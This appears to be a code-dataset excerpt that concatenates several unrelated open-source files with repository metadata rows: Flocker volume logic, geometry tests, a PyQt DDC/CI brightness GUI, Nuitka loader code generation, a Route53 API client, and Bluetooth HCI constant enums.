d.addCallback(lambda change: change.run(self))
return d
def find_volume_changes(hostname, current_state, desired_state):
"""
Find what actions need to be taken to deal with changes in volume
location between current state and desired state of the cluster.
    XXX The logic here assumes the mountpoints have not changed,
    and will act unexpectedly if they have changed. See
https://github.com/ClusterHQ/flocker/issues/351 for more details.
XXX The logic here assumes volumes are never added or removed to
existing applications, merely moved across nodes. As a result test
coverage for those situations is not implemented. See
https://github.com/ClusterHQ/flocker/issues/352 for more details.
XXX Comparison is done via volume name, rather than AttachedVolume
objects, until https://github.com/ClusterHQ/flocker/issues/289 is fixed.
:param unicode hostname: The name of the node for which to find changes.
:param Deployment current_state: The old state of the cluster on which the
changes are based.
:param Deployment desired_state: The new state of the cluster towards which
the changes are working.
"""
desired_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in desired_state.nodes}
current_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in current_state.nodes}
local_desired_volumes = desired_volumes.get(hostname, set())
local_desired_volume_names = set(volume.name for volume in
local_desired_volumes)
local_current_volume_names = set(volume.name for volume in
current_volumes.get(hostname, set()))
remote_current_volume_names = set()
for volume_hostname, current in current_volumes.items():
if volume_hostname != hostname:
remote_current_volume_names |= set(
volume.name for volume in current)
# Look at each application volume that is going to be running
# elsewhere and is currently running here, and add a VolumeHandoff for
# it to `going`.
going = set()
for volume_hostname, desired in desired_volumes.items():
if volume_hostname != hostname:
for volume in desired:
if volume.name in local_current_volume_names:
going.add(VolumeHandoff(volume=volume,
hostname=volume_hostname))
# Look at each application volume that is going to be started on this
# node. If it was running somewhere else, we want that Volume to be
# in `coming`.
coming_names = local_desired_volume_names.intersection(
remote_current_volume_names)
coming = set(volume for volume in local_desired_volumes
if volume.name in coming_names)
# For each application volume that is going to be started on this node
# that was not running anywhere previously, make sure that Volume is
# in `creating`.
creating_names = local_desired_volume_names.difference(
local_current_volume_names | remote_current_volume_names)
creating = set(volume for volume in local_desired_volumes
if volume.name in creating_names)
return VolumeChanges(going=going, coming=coming, creating=creating)
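# Sketch with made-up names: if volume "db" currently runs on this node
# but is desired on node "b", it lands in `going`; the reverse direction
# puts it in `coming`; a desired volume that exists on no node yet lands
# in `creating`.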
|
apache-2.0
| 2,322,558,771,706,020,000
| 36.709939
| 79
| 0.612232
| false
| 4.666416
| true
| false
| false
|
superbob/YunoSeeMe
|
test_geometry.py
|
1
|
1158
|
"""
Tests for the geometry module
"""
import geometry
EPSILON = 0.001
EPSILON_L = 0.0000001
EPSILON_H = 0.1
def test_half_central_angle():
expected = 0.0016830423969495
actual = geometry.half_central_angle(0.76029552909832, 0.0252164472196439, 0.76220881138424, 0.0213910869250003)
assert abs(expected - actual) <= EPSILON_L
def test_central_angle():
expected = 0.003366084793899
actual = geometry.central_angle(0.76029552909832, 0.0252164472196439, 0.76220881138424, 0.0213910869250003)
assert abs(expected - actual) <= EPSILON_L
def test_quadratic_mean():
expected = 6367453.627
actual = geometry.quadratic_mean(geometry.EQUATORIAL_RADIUS, geometry.POLAR_RADIUS)
assert abs(expected - actual) <= EPSILON_H
def test_distance_between_wgs84_coordinates():
expected = 21433.388831
actual = geometry.distance_between_wgs84_coordinates(43.561725, 1.444796, 43.671348, 1.225619)
assert abs(expected - actual) <= EPSILON
def test_overhead_height():
expected = 2.731679321737121
actual = geometry.overhead_height(0.00092629, geometry.EARTH_RADIUS)
assert abs(expected - actual) <= EPSILON
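# Cross-check (the two fixtures above describe the same pair of points):
# central_angle * quadratic mean radius ~= 0.003366085 * 6367453.627
# ~= 21433.39 m, which matches test_distance_between_wgs84_coordinates.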
|
bsd-2-clause
| 2,468,521,084,359,345,000
| 28.692308
| 116
| 0.729706
| false
| 2.939086
| true
| false
| false
|
Informatic/python-ddcci
|
qddccigui.py
|
1
|
3058
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
PyQt4 DDC/CI GUI, python-ddcci example
"""
import sys
import ddcci
import os
from PyQt4 import QtGui, QtCore
from PyKDE4.kdeui import KStatusNotifierItem
script_path = os.path.dirname(os.path.realpath(os.path.abspath(__file__)))
assets_path = os.path.join(script_path, 'assets')
def asset(name):
return os.path.join(assets_path, name)
class QDDCCIGui(QtGui.QWidget):
controls = [{
'tag': 'brightness',
'name': 'Brightness',
'id': 0x10,
}, {
'tag': 'contrast',
        'name': 'Contrast',
'id': 0x12,
}]
scroll_control = controls[1]
def __init__(self, busid):
super(QDDCCIGui, self).__init__()
self.device = ddcci.DDCCIDevice(busid)
self.init_ui()
def init_ui(self):
grid = QtGui.QGridLayout()
grid.setSpacing(2)
for i, control in enumerate(self.controls):
icon = QtGui.QLabel(self)
icon.setPixmap(QtGui.QPixmap(asset('%s.png' % control['tag'])))
icon.setToolTip(control['name'])
grid.addWidget(icon, i+1, 0)
label = QtGui.QLabel(self)
label.setMinimumWidth(32)
label.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignRight)
grid.addWidget(label, i+1, 1)
sld = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld.label = label
sld.control = control
value, max_value = self.device.read(control['id'], True)
sld.setMinimum(0)
sld.setMaximum(max_value)
sld.setValue(value)
self.update_label(sld)
sld.setMinimumWidth(150)
sld.setFocusPolicy(QtCore.Qt.NoFocus)
sld.valueChanged[int].connect(self.change_value)
control['slider'] = sld # FIXME circular reference
grid.addWidget(sld, i+1, 2)
self.setLayout(grid)
self.setGeometry(300, 300, 280, 70)
self.setWindowTitle('Qt DDC/CI Gui')
self.show()
if self.scroll_control:
self.tray_icon = KStatusNotifierItem("qddccigui", self)
self.tray_icon.setIconByPixmap(QtGui.QIcon(QtGui.QPixmap(
asset('%s.png' % self.scroll_control['tag']))))
self.tray_icon.scrollRequested[int, QtCore.Qt.Orientation].\
connect(self.scroll_requested)
def change_value(self, value, update=True):
self.update_label(self.sender())
if update:
self.device.write(self.sender().control['id'], value)
def scroll_requested(self, delta, orientation):
new_value = self.scroll_control['slider'].value() + delta/24
self.scroll_control['slider'].setValue(new_value)
def update_label(self, sld):
sld.label.setText('%d%%' % sld.value())
def main():
app = QtGui.QApplication(sys.argv)
argv = app.arguments()
ex = QDDCCIGui(int(argv[1]) if len(argv) > 1 else 8)
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
mit
| 294,655,486,794,354,240
| 27.055046
| 77
| 0.584696
| false
| 3.463194
| false
| false
| false
|
wfxiang08/Nuitka
|
nuitka/codegen/LoaderCodes.py
|
1
|
2878
|
# Copyright 2015, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Code to generate and interact with module loaders.
This is for generating the look-up table for the modules included in a binary
or distribution folder.
"""
from .Indentation import indented
from .templates.CodeTemplatesLoader import (
template_metapath_loader_body,
template_metapath_loader_compiled_module_entry,
template_metapath_loader_compiled_package_entry,
template_metapath_loader_shlib_module_entry
)
def getModuleMetapathLoaderEntryCode(module_name, module_identifier,
is_shlib, is_package):
if is_shlib:
assert module_name != "__main__"
assert not is_package
return template_metapath_loader_shlib_module_entry % {
"module_name" : module_name
}
elif is_package:
return template_metapath_loader_compiled_package_entry % {
"module_name" : module_name,
"module_identifier" : module_identifier,
}
else:
return template_metapath_loader_compiled_module_entry % {
"module_name" : module_name,
"module_identifier" : module_identifier,
}
def getMetapathLoaderBodyCode(other_modules):
metapath_loader_inittab = []
metapath_module_decls = []
for other_module in other_modules:
metapath_loader_inittab.append(
getModuleMetapathLoaderEntryCode(
module_name = other_module.getFullName(),
module_identifier = other_module.getCodeName(),
is_shlib = other_module.isPythonShlibModule(),
is_package = other_module.isPythonPackage()
)
)
if not other_module.isPythonShlibModule():
metapath_module_decls.append(
"MOD_INIT_DECL( %s );" % other_module.getCodeName()
)
return template_metapath_loader_body % {
"use_loader" : 1 if other_modules else 0,
"metapath_module_decls" : indented(metapath_module_decls, 0),
"metapath_loader_inittab" : indented(metapath_loader_inittab)
}
|
apache-2.0
| -997,178,309,059,129,200
| 35.43038
| 78
| 0.64663
| false
| 3.98615
| false
| false
| false
|
jcastillocano/python-route53
|
route53/connection.py
|
1
|
17310
|
from lxml import etree
from route53 import xml_parsers, xml_generators
from route53.exceptions import Route53Error
from route53.transport import RequestsTransport
from route53.xml_parsers.common_change_info import parse_change_info
class Route53Connection(object):
"""
Instances of this class are instantiated by the top-level
:py:func:`route53.connect` function, and serve as a high level gateway
to the Route 53 API. The majority of your interaction with these
instances will probably be creating, deleting, and retrieving
:py:class:`HostedZone <route53.hosted_zone.HostedZone>` instances.
.. warning:: Do not instantiate instances of this class yourself.
"""
endpoint_version = '2012-02-29'
"""The date-based API version. Mostly visible for your reference."""
def __init__(self, aws_access_key_id, aws_secret_access_key, endpoint_version = '2012-02-29', **kwargs):
"""
:param str aws_access_key_id: An account's access key ID.
:param str aws_secret_access_key: An account's secret access key.
"""
self.endpoint_version = endpoint_version
self._endpoint = 'https://route53.amazonaws.com/%s/' % self.endpoint_version
self._xml_namespace = 'https://route53.amazonaws.com/doc/%s/' % self.endpoint_version
self._aws_access_key_id = aws_access_key_id
self._aws_secret_access_key = aws_secret_access_key
if 'transport_class' not in kwargs or kwargs['transport_class'] is None:
self._transport = RequestsTransport(self)
else:
self._transport = kwargs['transport_class'](self)
def _send_request(self, path, data, method):
"""
Uses the HTTP transport to query the Route53 API. Runs the response
through lxml's parser, before we hand it off for further picking
apart by our call-specific parsers.
:param str path: The RESTful path to tack on to the :py:attr:`endpoint`.
:param data: The params to send along with the request.
:type data: Either a dict or bytes, depending on the request type.
:param str method: One of 'GET', 'POST', or 'DELETE'.
:rtype: lxml.etree._Element
:returns: An lxml Element root.
"""
response_body = self._transport.send_request(path, data, method)
root = etree.fromstring(response_body)
return root
def _do_autopaginating_api_call(self, path, params, method, parser_func,
next_marker_xpath, next_marker_param_name,
next_type_xpath=None, parser_kwargs=None):
"""
Given an API method, the arguments passed to it, and a function to
hand parsing off to, loop through the record sets in the API call
until all records have been yielded.
:param str method: The API method on the endpoint.
:param dict params: The kwargs from the top-level API method.
:param callable parser_func: A callable that is used for parsing the
output from the API call.
        :param str next_marker_xpath: The XPath to the marker tag that
will determine whether we continue paginating.
:param str next_marker_param_name: The parameter name to manipulate
in the request data to bring up the next page on the next
request loop.
:keyword str next_type_xpath: For the
py:meth:`list_resource_record_sets_by_zone_id` method, there's
an additional paginator token. Specifying this XPath looks for it.
:keyword dict parser_kwargs: Optional dict of additional kwargs to pass
on to the parser function.
:rtype: generator
:returns: Returns a generator that may be returned by the top-level
API method.
"""
if not parser_kwargs:
parser_kwargs = {}
# We loop indefinitely since we have no idea how many "pages" of
# results we're going to have to go through.
while True:
# An lxml Element node.
root = self._send_request(path, params, method)
# Individually yield HostedZone instances after parsing/instantiating.
for record in parser_func(root, connection=self, **parser_kwargs):
yield record
# This will determine at what offset we start the next query.
next_marker = root.find(next_marker_xpath)
if next_marker is None:
# If the NextMarker tag is absent, we know we've hit the
# last page.
break
# if NextMarker is present, we'll adjust our API request params
# and query again for the next page.
params[next_marker_param_name] = next_marker.text
if next_type_xpath:
# This is a _list_resource_record_sets_by_zone_id call. Look
# for the given tag via XPath and adjust our type arg for
# the next request. Without specifying this, we loop
# infinitely.
next_type = root.find(next_type_xpath)
params['type'] = next_type.text
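    # Pagination sketch (tag names vary per call, marker value made up):
    # a response containing <NextMarker>Z123</NextMarker> makes the next
    # request include marker=Z123 in its params; a response without the
    # tag ends the generator.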
def list_hosted_zones(self, page_chunks=100):
"""
List all hosted zones associated with this connection's account. Since
this method returns a generator, you can pull as many or as few
entries as you'd like, without having to query and receive every
hosted zone you may have.
:keyword int page_chunks: This API call is "paginated" behind-the-scenes
in order to break up large result sets. This number determines
the maximum number of
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instances to retrieve per request. The default is fine for almost
everyone.
:rtype: generator
:returns: A generator of :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instances.
"""
return self._do_autopaginating_api_call(
path='hostedzone',
params={'maxitems': page_chunks},
method='GET',
parser_func=xml_parsers.list_hosted_zones_parser,
next_marker_xpath="./{*}NextMarker",
next_marker_param_name="marker",
)
def create_hosted_zone(self, name, caller_reference=None, comment=None):
"""
Creates and returns a new hosted zone. Once a hosted zone is created,
its details can't be changed.
:param str name: The name of the hosted zone to create.
:keyword str caller_reference: A unique string that identifies the
request and that allows failed create_hosted_zone requests to be
retried without the risk of executing the operation twice. If no
value is given, we'll generate a Type 4 UUID for you.
:keyword str comment: An optional comment to attach to the zone.
:rtype: tuple
:returns: A tuple in the form of ``(hosted_zone, change_info)``.
The ``hosted_zone`` variable contains a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance matching the newly created zone, and ``change_info``
is a dict with some details about the API request.
"""
body = xml_generators.create_hosted_zone_writer(
connection=self,
name=name,
caller_reference=caller_reference,
comment=comment
)
root = self._send_request(
path='hostedzone',
data=body,
method='POST',
)
return xml_parsers.created_hosted_zone_parser(
root=root,
connection=self
)
def get_hosted_zone_by_id(self, id):
"""
Retrieves a hosted zone, by hosted zone ID (not name).
:param str id: The hosted zone's ID (a short hash string).
:rtype: :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
:returns: An :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance representing the requested hosted zone.
"""
root = self._send_request(
path='hostedzone/%s' % id,
data={},
method='GET',
)
return xml_parsers.get_hosted_zone_by_id_parser(
root=root,
connection=self,
)
def delete_hosted_zone_by_id(self, id):
"""
Deletes a hosted zone, by hosted zone ID (not name).
.. tip:: For most cases, we recommend deleting hosted zones via a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance's
:py:meth:`HostedZone.delete <route53.hosted_zone.HostedZone.delete>`
method, but this saves an HTTP request if you already know the zone's ID.
.. note:: Unlike
:py:meth:`HostedZone.delete <route53.hosted_zone.HostedZone.delete>`,
this method has no optional ``force`` kwarg.
:param str id: The hosted zone's ID (a short hash string).
:rtype: dict
:returns: A dict of change info, which contains some details about
the request.
"""
root = self._send_request(
path='hostedzone/%s' % id,
data={},
method='DELETE',
)
return xml_parsers.delete_hosted_zone_by_id_parser(
root=root,
connection=self,
)
def _list_resource_record_sets_by_zone_id(self, id, rrset_type=None,
identifier=None, name=None,
page_chunks=100):
"""
Lists a hosted zone's resource record sets by Zone ID, if you
already know it.
.. tip:: For most cases, we recommend going through a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance's
:py:meth:`HostedZone.record_sets <route53.hosted_zone.HostedZone.record_sets>`
property, but this saves an HTTP request if you already know the
zone's ID.
:param str id: The ID of the zone whose record sets we're listing.
:keyword str rrset_type: The type of resource record set to begin the
record listing from.
:keyword str identifier: Weighted and latency resource record sets
only: If results were truncated for a given DNS name and type,
the value of SetIdentifier for the next resource record set
that has the current DNS name and type.
        :keyword str name: The DNS domain name to begin the record listing
            from (used when resuming a paginated listing).
:keyword int page_chunks: This API call is paginated behind-the-scenes
by this many ResourceRecordSet instances. The default should be
fine for just about everybody, aside from those with tons of RRS.
:rtype: generator
:returns: A generator of ResourceRecordSet instances.
"""
params = {
'name': name,
'type': rrset_type,
'identifier': identifier,
'maxitems': page_chunks,
}
return self._do_autopaginating_api_call(
path='hostedzone/%s/rrset' % id,
params=params,
method='GET',
parser_func=xml_parsers.list_resource_record_sets_by_zone_id_parser,
parser_kwargs={'zone_id': id},
next_marker_xpath="./{*}NextRecordName",
next_marker_param_name="name",
next_type_xpath="./{*}NextRecordType"
)
def _change_resource_record_sets(self, change_set, comment=None):
"""
Given a ChangeSet, POST it to the Route53 API.
.. note:: You probably shouldn't be using this method directly,
as there are convenience methods on the ResourceRecordSet
sub-classes.
:param change_set.ChangeSet change_set: The ChangeSet object to create
the XML doc from.
:keyword str comment: An optional comment to go along with the request.
:rtype: dict
:returns: A dict of change info, which contains some details about
the request.
"""
body = xml_generators.change_resource_record_set_writer(
connection=self,
change_set=change_set,
comment=comment
)
root = self._send_request(
path='hostedzone/%s/rrset' % change_set.hosted_zone_id,
data=body,
method='POST',
)
e_change_info = root.find('./{*}ChangeInfo')
if e_change_info is None:
error = root.find('./{*}Error').find('./{*}Message').text
raise Route53Error(error)
return parse_change_info(e_change_info)
def list_health_checks(self, page_chunks=100):
"""
        List all health checks associated with this connection's account. Since
        this method returns a generator, you can pull as many or as few
        entries as you'd like, without having to query and receive every
        health check you may have.
        :keyword int page_chunks: This API call is "paginated" behind-the-scenes
            in order to break up large result sets. This number determines
            the maximum number of health check instances to retrieve per
            request. The default is fine for almost everyone.
        :rtype: generator
        :returns: A generator of health check instances.
"""
return self._do_autopaginating_api_call(
path='healthcheck',
params={'maxitems': page_chunks},
method='GET',
parser_func=xml_parsers.list_health_checks_parser,
next_marker_xpath="./{*}NextMarker",
next_marker_param_name="marker",
)
def create_health_check(self, ipaddress, port, type, resource_path, fqdn, search_string, caller_reference=None):
"""
        Creates and returns a new health check. Once a health check is
        created, its details can't be changed.
        :param str ipaddress: The IP address of the endpoint to monitor.
        :param int port: The port to connect to on the endpoint.
        :param str type: The kind of health check to perform (for example,
            HTTP or TCP).
        :param str resource_path: The path to request when checking an
            HTTP(S) endpoint.
        :param str fqdn: The fully qualified domain name of the endpoint.
        :param str search_string: For string-matching checks, the string to
            search for in the response body.
        :keyword str caller_reference: A unique string that identifies the
            request and that allows failed create_health_check requests to be
            retried without the risk of executing the operation twice. If no
            value is given, we'll generate a Type 4 UUID for you.
        :returns: The parsed API response describing the newly created
            health check.
"""
body = xml_generators.create_health_check_writer(
connection=self,
caller_reference=caller_reference,
ipaddress=ipaddress,
port=port,
type=type,
resource_path=resource_path,
fqdn=fqdn,
search_string=search_string
)
root = self._send_request(
path='healthcheck',
data=body,
method='POST',
)
return xml_parsers.created_health_check_parser(
root=root,
connection=self
)
def get_health_check_by_id(self, id):
"""
        Retrieves a health check, by health check ID.
        :param str id: The health check's ID (a short hash string).
        :returns: The parsed API response representing the requested
            health check.
"""
root = self._send_request(
path='healthcheck/%s' % id,
data={},
method='GET',
)
return xml_parsers.get_health_check_by_id_parser(
root=root,
connection=self,
)
def delete_health_check_by_id(self, id):
"""
        Deletes a health check, by health check ID.
        :param str id: The health check's ID (a short hash string).
:rtype: dict
:returns: A dict of change info, which contains some details about
the request.
"""
root = self._send_request(
path='healthcheck/%s' % id,
data={},
method='DELETE',
)
return xml_parsers.delete_health_check_by_id_parser(
root=root,
connection=self,
)
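# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). It assumes the
# upstream python-route53 entry point, route53.connect(), plus placeholder
# AWS credentials; adapt the names to however this fork exposes a connection.
#
#     import route53
#     conn = route53.connect(
#         aws_access_key_id="YOUR_KEY_ID",          # placeholder
#         aws_secret_access_key="YOUR_SECRET_KEY",  # placeholder
#     )
#     # Pagination is handled by _do_autopaginating_api_call, so iterating
#     # the generator transparently walks every page of results.
#     for zone in conn.list_hosted_zones(page_chunks=50):
#         print(zone)
# ---------------------------------------------------------------------------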
|
mit
| 6,657,116,449,463,134,000
| 38.884793
| 116
| 0.602137
| false
| 4.334001
| false
| false
| false
|
scipag/btle-sniffer
|
src/btlesniffer/hci_constants.py
|
1
|
50832
|
# -*- coding: utf-8 -*-
"""
Provides constants common in the Bluetooth HCI protocol.
"""
import enum
HCI_MAX_EVENT_SIZE = 260
class Status(enum.IntEnum):
"""
Collection of HCI return states.
"""
Success = 0x00
UnknownHciCommand = 0x01
UnknownConnectionIdentifier = 0x02
HardwareFailure = 0x03
PageTimeout = 0x04
AuthenticationFailure = 0x05
PinOrKeyMissing = 0x06
MemoryCapacityExceeded = 0x07
ConnectionTimeout = 0x08
ConnectionLimitExceeded = 0x09
SynchronousConnectionLimitExceeded = 0x0a
ACLConnectionAlreadyExists = 0x0b
CommandDisallowed = 0x0c
ConnectionRejectedLimitedResources = 0x0d
ConnectionRejectedSecurityReasons = 0x0e
ConnectionRejectedUnnacceptableBDAddr = 0x0f
ConnectionAcceptTimeoutExceeded = 0x10
UnsupportedFeatureOrParameterValue = 0x11
InvalidHciCommandParameters = 0x12
RemoteUserTerminatedConnection = 0x13
RemoteDeviceTerminatedConnectionLowResources = 0x14
RemoteDeviceTerminatedConnectionPowerOff = 0x15
ConnectionTerminatedLocalHost = 0x16
RepeatedAttempts = 0x17
PairingNotAllowed = 0x18
UnknownLmpPdu = 0x19
UnsupportedRemoteFeature = 0x1a
ScoOffsetRejected = 0x1b
ScoIntervalRejected = 0x1c
ScoAirModeRejected = 0x1d
InvalidLmpParameters = 0x1e
UnspecifiedError = 0x1f
UnsupportedLmpParameterValue = 0x20
RoleChangeNotAllowed = 0x21
LmpResponseTimeout = 0x22
LmpErrorTransactionCollision = 0x23
LmpPduNotAllowed = 0x24
EncryptionModeNotAcceptable = 0x25
LinkKeyCannotChange = 0x26
RequestedQosNotSupported = 0x27
InstantPassed = 0x28
PairingWithUnitKeyNotSupported = 0x29
DifferentTransactionCollision = 0x2a
QosUnnacceptableParameter = 0x2c
QosRejected = 0x2d
ChannelClassificationNotSupported = 0x2e
InsufficientSecurity = 0x2f
ParameterOutOfMandatoryRange = 0x30
RoleSwitchPending = 0x32
RoleSwitchFailed = 0x35
ExtendedInquiryResponseTooLarge = 0x36
SecureSimplePairingNotSupportedByHost = 0x37
HostBusyPairing = 0x38
ConnectionRejectedNoSuitableChannel = 0x39
ControllerBusy = 0x3a
UnacceptableConnectionParameters = 0x3b
DirectedAdvertisingTimeout = 0x3c
ConnectionTerminatedMicFailure = 0x3d
ConnectionEstablishFailure = 0x3e
MacConnectionFailed = 0x3f
CoarseClockAdjustmentRejected = 0x40
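# Illustrative helper (not part of the original module): map a raw HCI status
# byte to a readable name, falling back gracefully for codes the enum does
# not cover.
def describe_status(code):
    """Return the Status member name for ``code``, or a hex fallback."""
    try:
        return Status(code).name
    except ValueError:
        return "UnknownStatus(0x{:02x})".format(code)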
class PacketType(enum.IntEnum):
"""
Known HCI packet types.
"""
Invalid = 0x00
Command = 0x01
Async = 0x02
Sync = 0x03
Event = 0x04
class Event(enum.IntEnum):
"""
Common HCI event types.
"""
CommandComplete = 0x0e
CommandStatus = 0x0f
HardwareError = 0x10
DataBufferOverflow = 0x1a
Le = 0x3e
VendorSpecific = 0xff
class LeEvent(enum.IntEnum):
"""
Common HCI LE event types.
"""
LeAdvertisingReport = 0x02
class GapProfile(enum.IntEnum):
"""
GAP communication roles/profiles.
"""
Broadcaster = 0x01
Observer = 0x02
Peripheral = 0x04
Central = 0x08
class DiscoveryType(enum.IntEnum):
"""
LeAdvertisingReport message type.
"""
ConnectableUndirectedAdvertising = 0x00
ConnectableDirectedAdvertising = 0x01
ScannableUndirectedAdvertising = 0x02
NonConnectableUndirectedAdvertising = 0x03
ScanResponse = 0x04
class AddressType(enum.IntEnum):
"""
Device address type.
"""
PublicDeviceAddress = 0x00
RandomDeviceAddress = 0x01
PublicIdentityAddress = 0x02
RandomIdentityAddress = 0x03
UnknownAddressType = 0x04
class ScanType(enum.IntEnum):
"""
LE scan type.
"""
PassiveScan = 0x00
ActiveScan = 0x01
class FilterPolicy(enum.IntEnum):
"""
LE scan filter policy.
"""
UndirectedAdsOnly = 0x00
WhitelistedOnly = 0x01
ResolvableDirected = 0x02
WhitelistedAndResolvableDirected = 0x03
class AdType(enum.IntEnum):
"""
Advertisement data type.
"""
Flags = 0x01
IncompleteListOf16BitServiceClassUUIDs = 0x02
CompleteListOf16BitServiceClassUUIDs = 0x03
IncompleteListOf32BitServiceClassUUIDs = 0x04
CompleteListOf32BitServiceClassUUIDs = 0x05
IncompleteListOf128BitServiceClassUUIDs = 0x06
CompleteListOf128BitServiceClassUUIDs = 0x07
ShortenedLocalName = 0x08
CompleteLocalName = 0x09
TxPowerLevel = 0x0a
ClassOfDevice = 0x0d
SimplePairingHashC192 = 0x0e
SimplePairingRandomizerR192 = 0x0f
SecurityManagerTKValue = 0x10
SecurityManagerOutOfBandFlags = 0x11
SlaveConnectionIntervalRange = 0x12
ListOf16BitServiceSolicitationUUIDs = 0x14
ListOf32BitServiceSolicitationUUIDs = 0x1f
ListOf128BitServiceSolicitationUUIDs = 0x15
ServiceData16BitUUID = 0x16
ServiceData32BitUUID = 0x20
ServiceData128BitUUID = 0x21
LeSecureConnectionsConfirmationValue = 0x22
LeSecureConnectionsRandomValue = 0x23
URI = 0x24
IndoorPositioning = 0x25
TransportDiscoveryData = 0x26
PublicTargetAddress = 0x17
RandomTargetAddress = 0x18
Appearance = 0x19
AdvertisingInterval = 0x1a
LeBluetoothDeviceAddress = 0x1b
LeRole = 0x1c
SimplePairingHashC256 = 0x1d
SimplePairingRandomizerR256 = 0x1e
InformationData = 0x3d
ManufacturerSpecificData = 0xff
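# Illustrative helper (not part of the original module): BLE advertising
# payloads are a sequence of AD structures, each encoded as one length byte,
# one type byte, and (length - 1) data bytes. A minimal parser sketch using
# the AdType enum above; parse_ad_structures(b"\x02\x01\x06") yields
# (AdType.Flags, b"\x06").
def parse_ad_structures(payload):
    """Yield (AdType or int, bytes) pairs from a raw advertising payload."""
    i = 0
    while i + 1 < len(payload):
        length = payload[i]
        if length == 0:
            break  # a zero length byte marks padding after the payload
        ad_type = payload[i + 1]
        data = payload[i + 2:i + 1 + length]
        try:
            ad_type = AdType(ad_type)
        except ValueError:
            pass  # unknown AD type; keep the raw integer
        yield ad_type, data
        i += 1 + length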
class CompanyId(enum.IntEnum):
"""
Known company identifiers.
"""
EricssonTechnologyLicensing = 0x0000
NokiaMobilePhones = 0x0001
IntelCorp = 0x0002
IBMCorp = 0x0003
ToshibaCorp = 0x0004
ThreeCom = 0x0005
Microsoft = 0x0006
Lucent = 0x0007
Motorola = 0x0008
InfineonTechnologiesAG = 0x0009
CambridgeSiliconRadio = 0x000a
SiliconWave = 0x000b
DigianswerAS = 0x000c
TexasInstrumentsInc = 0x000d
CevaInc = 0x000e
BroadcomCorporation = 0x000f
MitelSemiconductor = 0x0010
WidcommInc = 0x0011
ZeevoInc = 0x0012
AtmelCorporation = 0x0013
MitsubishiElectricCorporation = 0x0014
RTXTelecomAS = 0x0015
KCTechnologyInc = 0x0016
NewLogic = 0x0017
TransilicaInc = 0x0018
RohdeSchwarzGmbHCoKG = 0x0019
TTPComLimited = 0x001a
SigniaTechnologiesInc = 0x001b
ConexantSystemsInc = 0x001c
Qualcomm = 0x001d
Inventel = 0x001e
AVMBerlin = 0x001f
BandSpeedInc = 0x0020
MansellaLtd = 0x0021
NECCorporation = 0x0022
WavePlusTechnologyCoLtd = 0x0023
Alcatel = 0x0024
NXPSemiconductors = 0x0025
CTechnologies = 0x0026
OpenInterface = 0x0027
RFMicroDevices = 0x0028
HitachiLtd = 0x0029
SymbolTechnologiesInc = 0x002a
Tenovis = 0x002b
MacronixInternationalCoLtd = 0x002c
GCTSemiconductor = 0x002d
NorwoodSystems = 0x002e
MewTelTechnologyInc = 0x002f
STMicroelectronics = 0x0030
Synopsis = 0x0031
RedMLtd = 0x0032
CommilLtd = 0x0033
ComputerAccessTechnologyCorporation = 0x0034
EclipseSL = 0x0035
RenesasElectronicsCorporation = 0x0036
MobilianCorporation = 0x0037
Terax = 0x0038
IntegratedSystemSolutionCorp = 0x0039
MatsushitaElectricIndustrialCoLtd = 0x003a
GennumCorporation = 0x003b
BlackBerryLimited = 0x003c
IPextremeInc = 0x003d
SystemsandChipsInc = 0x003e
BluetoothSIGInc = 0x003f
SeikoEpsonCorporation = 0x0040
IntegratedSiliconSolutionTaiwanInc = 0x0041
CONWISETechnologyCorporationLtd = 0x0042
PARROTSA = 0x0043
SocketMobile = 0x0044
AtherosCommunicationsInc = 0x0045
MediaTekInc = 0x0046
Bluegiga = 0x0047
MarvellTechnologyGroupLtd = 0x0048
ThreeDSPCorporation = 0x0049
AccelSemiconductorLtd = 0x004a
ContinentalAutomotiveSystems = 0x004b
AppleInc = 0x004c
StaccatoCommunicationsInc = 0x004d
AvagoTechnologies = 0x004e
APTLicensingLtd = 0x004f
SiRFTechnology = 0x0050
TzeroTechnologiesInc = 0x0051
JMCorporation = 0x0052
Free2moveAB = 0x0053
ThreeDiJoyCorporation = 0x0054
PlantronicsInc = 0x0055
SonyEricssonMobileCommunications = 0x0056
HarmanInternationalIndustriesInc = 0x0057
VizioInc = 0x0058
NordicSemiconductorASA = 0x0059
EMMicroelectronicMarinSA = 0x005a
RalinkTechnologyCorporation = 0x005b
BelkinInternationalInc = 0x005c
RealtekSemiconductorCorporation = 0x005d
StonestreetOneLLC = 0x005e
WicentricInc = 0x005f
RivieraWavesSAS = 0x0060
RDAMicroelectronics = 0x0061
GibsonGuitars = 0x0062
MiCommandInc = 0x0063
BandXIInternationalLLC = 0x0064
HewlettPackardCompany = 0x0065
NineSolutionsOy = 0x0066
GNNetcomAS = 0x0067
GeneralMotors = 0x0068
ADEngineeringInc = 0x0069
MindTreeLtd = 0x006a
PolarElectroOY = 0x006b
BeautifulEnterpriseCoLtd = 0x006c
BriarTekInc = 0x006d
SummitDataCommunicationsInc = 0x006e
SoundID = 0x006f
MonsterLLC = 0x0070
connectBlueAB = 0x0071
ShangHaiSuperSmartElectronicsCoLtd = 0x0072
GroupSenseLtd = 0x0073
ZommLLC = 0x0074
SamsungElectronicsCoLtd = 0x0075
CreativeTechnologyLtd = 0x0076
LairdTechnologies = 0x0077
NikeInc = 0x0078
lesswireAG = 0x0079
